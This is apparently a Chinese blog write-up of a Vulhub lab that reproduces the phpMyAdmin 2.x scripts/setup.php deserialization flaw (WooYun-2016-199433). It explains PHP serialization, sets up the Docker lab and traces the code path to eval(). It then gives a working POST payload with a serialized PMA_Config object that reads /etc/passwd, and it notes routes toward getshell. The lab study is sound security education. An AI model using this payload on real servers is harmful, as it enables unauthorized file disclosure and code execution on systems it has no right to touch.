[Vulhub](WooYun-2016-199433)phpmyadmin反序列化漏洞

最新推荐文章于 2024-05-03 19:26:50 发布
最新推荐文章于 2024-05-03 19:26:50 发布
阅读量310 收藏
点赞数
分类专栏: # 靶场 文章标签: web安全
原文链接:https://blog.csdn.net/weixin_45605352/article/details/116128814?utm_medium=distribute.pc_relevant.none-task-blog-2~default~baidujs_title~default-1.no_search_link&spm=1001.2101.3001.4242.2
版权

0x00 预备知识

什么是序列化
  • 序列化 (serialize)是将对象的状态信息转换为可以存储或传输的形式的过程。在序列化期间,对象将其当前状态写入到临时或持久性存储区。以后,可以通过从存储区中读取或反序列化对象的状态,重新创建该对象。【将状态信息保存为字符串】
  • 简单的理解:将PHP中 对象、类、数组、变量、匿名函数等,转化为字符串,方便保存到数据库或者文件中
  • 当在php中创建了一个对象后,可以通过serialize()把这个对象转变成一个字符串,保存对象的值方便之后的传递与使用。
什么是反序列化
  • 序列化就是将对象的状态信息转为字符串储存起来,那么反序列化就是再将这个状态信息拿出来使用。(重新再转化为对象或者其他的)【将字符串转化为状态信息】
  • 与 serialize() 对应的,unserialize()可以从已存储的表示中创建PHP的值
反序列化漏洞
  • 本质上serialize()和unserialize()在PHP内部实现上是没有漏洞的,漏洞的主要产生是由于应用程序在处理对象、魔术函数以及序列化相关问题的时候导致的。
  • 当传给 unserialize() 的参数可控时,那么用户就可以注入精心构造的payload。当进行反序列化的时候就有可能会触发对象中的一些魔术方法,造成意想不到的危害。
魔术方法

php中有一类特殊的方法叫“Magic function”(魔术方法), 这里我们着重关注一下几个:

  • __construct():当对象创建(new)时会自动调用。但在unserialize()时是不会自动调用的。(构造函数)
  • __destruct():当对象被销毁时会自动调用。(析构函数)
  • __wakeup():如前所提,unserialize()时会自动调用。
  • __toString():方法用于一个类被当成字符串时应怎样回应。例如 echo $obj;应该显示些什么。

0x01 环境搭建

漏洞环境:https://vulhub.org/#/environments/phpmyadmin/WooYun-2016-199433/
启动环境

sudo docker-compose up

 
 

 
 
  • 1

在这里插入图片描述
查看当前运行漏洞环境

sudo docker ps

 
 

 
 
  • 1

在这里插入图片描述
本地访问没问题,环境搭建成功(因为没有连接到数据库,我们将得到一个错误。但此漏洞与数据库无关,因此请忽略)
在这里插入图片描述

0x02 影响范围

phpmyadmin 2.8.0.3

0x03 漏洞成因

通过 exec 命令对指定的容器执行 bash然后查看源码:

sudo docker exec -it 53b9559d9612 /bin/bash

 
 

 
 
  • 1

在这里插入图片描述
也可以下载到本地查看,更方便:

sudo docker cp 53b9559d9612:/var/www/html/libraries /home/vulhub/pma

 
 

 
 
  • 1

查看存在漏洞的文件代码 /scripts/setup.php
在这里插入图片描述

发现当configuration传参存在且action传参不为’clear’时,将传入的connfiguration给反序列化;而setup.php中又引入了common.lib.php,接下来查看common.lib.php:
在这里插入图片描述
common.lib.php中又引入了Config.class.php,接下来看Config.class.php:
在这里插入图片描述
Config.class.php中含有__wakeup()魔术方法,因此可以构造序列化参数,其中又调用了load()方法,接下来继续看load方法:
在这里插入图片描述
整体思路就是:

setup.php -> common.lib.php -> Config.class.php -> __wakeup() -> load() -> eval();

 
 

 
 
  • 1

0x04 漏洞复现

构造payload修改source的值后得到的序列化值作为configuration的传参,就可以输出任意文件内容
poc:

configuration=O:10:"PMA_Config":1:{s:6:"source",s:11:"/etc/passwd";}&action=test

 
 

 
 
  • 1

注意需要满足两个条件:1. POST请求方法;2. action的传参不为clear:
在这里插入图片描述
复现结束后别忘了关闭docker容器:

docker-compose down

 
 

 
 
  • 1

在这里插入图片描述

经过分析这个漏洞是不能读取php文件的,而因为又了eval()函数,相当于任意文件包含了。getshell需要包含上传的木马文件,也可以包含日志。但docker环境中并未开启日志功能,也没有上传点,因此getshell比较困难。

在Ubuntu下一般不允许root权限运行,无法读取access.log。在windows下几乎所有浏览器和python模块都会将特殊字符编码进行转换,getshell就更困难了,只能用socket去构造shell,参考下面这篇文章:
https://docs.ioin.in/writeup/www.mottoin.com/4cb63e7c-9151-42da-a5bd-e6e29e7ff2f8/index.html(pma任意文件包含导致代码执行)

参考链接:
https://docs.ioin.in/writeup/www.mottoin.com/4cb63e7c-9151-42da-a5bd-e6e29e7ff2f8/index.html(pma任意文件包含导致代码执行)
https://www.cnblogs.com/ichunqiu/p/10484832.html(PHP反序列化漏洞利用总结)

zxl2605
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
WooYun-2016-199433 phpmyadmin 反序列化漏洞
weixin_51387754的博客
12-08 360
漏洞简介 phpmyadmin 2.x版本中存在一处反序列化漏洞,通过该漏洞,攻击者可以读取任意文件或执行任意代码。 漏洞复现 执行如下命令启动phpmyadmin: docker-compose up -d 环境启动后,访问http://your-ip:8080,即可看到phpmyadmin的首页。因为没有连接数据库,所以此时会报错,但我们这个漏洞的利用与数据库无关,所以忽略。 发送如下数据包,即可读取/etc/passwd: POST /scripts/setup.php HTTP/1.1 Hos
py爬虫wooyun-public-master
04-20
py爬虫wooyun_public-master提取方式是百度网盘分享地址
wooyun-public-master-python.rar
01-23
wooyun_public-master-python.rar Python爬虫入门需要掌握Python基础语法、网络请求和数据抓取、解析HTML和XML、处理HTTP响应、数据存储、使用代理和反爬策略、并发和多线程等技术,并遵守相关法律和道德规范。
wooyun_public-master.zip
08-23
wooyun_public-master
wooyun_public-master-python.rar
02-03
wooyun_public-master-pythonpython源码python源码
Phpmyadmin Scripts / setup.php反序列化漏洞 WooYun-2016-199433 漏洞复现
ADummy的博客
02-27 409
Phpmyadmin Scripts / setup.php反序列化漏洞WooYun-2016-199433) by ADummy 0x00利用路线 ​ Burpsuite抓包改包—>有回显读取文件 0x01漏洞介绍 phpmyadmin 2.x版本中存在一处反序列化漏洞,通过该漏洞,攻击者可以读取任意文件或执行任意代码 影响版本 phpmyadmin 2.x 0x02漏洞复现 payload POST /scripts/setup.php HTTP/1.1 Host: your-ip:808
phpmyadmin反序列化漏洞
qq_53008544的博客
05-01 540
phpMyAdmin的Setup脚本用于生成配置。如果远程攻击者向该脚本提交了特制的POST请求的话,就可能在生成的config.inc.php配置文件中包含任意PHP代码。由于配置文件被保存到了服务器上,未经认证的远程攻击者可以利用这个漏洞执行任意PHP代码。
phpMyAdmin 4.8.x 最新版 本地文件包含漏洞利用
Ambulong的博客
06-21 5966
今天ChaMd5安全团队公开了一个phpMyAdmin最新版中的本地文件包含漏洞phpmyadmin4.8.1后台getshell。该漏洞利用不要求root帐号,只需能够登录 phpMyAdmin 便能够利用。 在这篇文章中我们将使用VulnSpy的在线 phpMyAdmin 环境来演示该漏洞的利用。 VulnSpy 在线 phpMyAdmin 环境地址:http://www.vulnspy.c...
phpmyadmin反序列化漏洞WooYun-2016-199433
笑花大王
03-27 839
简介 环境复现:https://github.com/vulhub/vulhub 线上平台:榆林学院内可使用协会内部的网络安全实验平台 phpMyAdmin是一套开源的、基于Web的MySQL数据库管理工具 影响版本 1 1 代码审计 1 利用过程 http://192.168.52.129:8080/scripts/setup.php 发送如下数据包,即可读取/etc/pass...
python爬虫案例wooyun-public-master.zip
最新发布
05-31
python爬虫案例
WooYun-2016-199433 phpmyadmin反序列化漏洞复现
丶没胡子的猫
01-25 961
目录漏洞描述影响版本漏洞环境搭建漏洞分析漏洞检测漏洞利用漏洞加固 漏洞描述    影响版本 phpMyAdmin 2.x版本 漏洞环境搭建 漏洞分析 漏洞检测 漏洞利用 漏洞加固
Ruby on Rails 路径穿越与任意文件读取漏洞(CVE-2019-5418)
黑白的博客
12-14 333
声明 好好学习,天天向上 漏洞描述 在控制器中通过render file形式来渲染应用之外的视图,且会根据用户传入的Accept头来确定文件具体位置。 通过传入Accept: …/…/…/…/…/…/…/…/etc/passwd{{ 头来构成构造路径穿越漏洞,读取任意文件。 影响范围 Rails全版本 其中修复版本 6.0.0.beta3, 5.2.2.1 5.1.6.2 5.0.7.2 4.2.11.1 复现过程 这里使用2.5.4版本 使用vulhub cd /app/vulhub-master/rai
Vulhub靶场-phpmyadmin scripts/setup.php 反序列化漏洞WooYun-2016-199433
Grace_for_it的博客
05-03 466
vulhub靶场复现 php源码 bp抓包 网络安全 渗透测试
phpmyadmin scripts/setup.php 反序列化漏洞WooYun-2016-199433
EC_Carrot的博客
07-20 245
漏洞简介 phpmyadmin 2.x版本中存在一处反序列化漏洞,通过该漏洞,攻击者可以读取任意文件或执行任意代码。 这个漏洞无需链接数据库,与数据库无关。 漏洞复现 发送如下数据包,即可读取/etc/passwd: POST /scripts/setup.php HTTP/1.1 Host: your-ip:8080 Accept-Encoding: gzip, deflate Accept: */* Accept-Language: en User-Agent: Mozilla/5.0 (compati
反序列化漏洞——http://159.75.16.25:8066 phpmyadmin scripts/setup.php 反序列化漏洞 http://159.75.16.25
m0_52341820的博客
04-14 362
php反序列化漏洞漏洞原理,如何防御此漏洞?如何利用此漏洞? 原理: 未对用户输入的序列化字符串进行检测,导致攻击者可以控制反序列化过程,从而导致代码执行,SQL注入,目录遍历等不可控后果 防御: 进行签名与认证,避免应用接受黑客的异常输入 限制序列化与反序列化的类,避免接受任何处理类型 RASP检测,判断应用是否执行了非应用本身的逻辑 利用: 通过该漏洞,可以在内容中嵌入执行自定义命令的代码,获取服务器的权限 可以构造其他,导致耗尽服务器的CPU,停止服务 可以获得途径 2、http:
phpmyadmin scripts/setup.php 反序列化漏洞复现实验
weixin_52347768的博客
02-25 4125
漏洞复现实验
Phpmyadmin 脚本/设置.php反序列化漏洞WooYun-2016-199433)复现
haoxue__的博客
03-14 142
setup.php 中对传入的configuration的参数在$action参数不等于clear的情况下会进行反序列化操作,requier_once()引用了librarises下的common.lib.php文件。查看文件comomon.lib.php,在__wakeup函数中调用了load()函数,而unserialize()反序列化时会优先检查是否存在__wakeup魔术方法,如果存在,就会优先调用__wakeup方法。对抓取的数据包进行更改,获取想要的文件内容。更新phpmyadmin版本。
PHP反序列化漏洞——漏洞原理及防御措施
cldimd的博客
03-20 6632
序列化 将对象转换成字符串 反序列化 将特定格式的字符串转换成对象 什么是反序列化漏洞 PHP反序列化漏洞也叫PHP对象注入,是一个非常常见的漏洞,这种类型的漏洞虽然有些难以利用,但一旦利用成功就会造成非常危险的后果。漏洞的形成的根本原因是程序没有对用户输入的反序列化字符串进行检测,导致反序列化过程可...
wooyun-2010-09336
01-14
wooyun-2010-09336是2010年发生的一起网络安全漏洞事件。这个漏洞是由于某个网站的后台管理系统存在缺陷,使得攻击者可以绕过身份验证,远程执行恶意代码,从而获取系统的控制权。 当时,一位白帽黑客通过对该网站...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值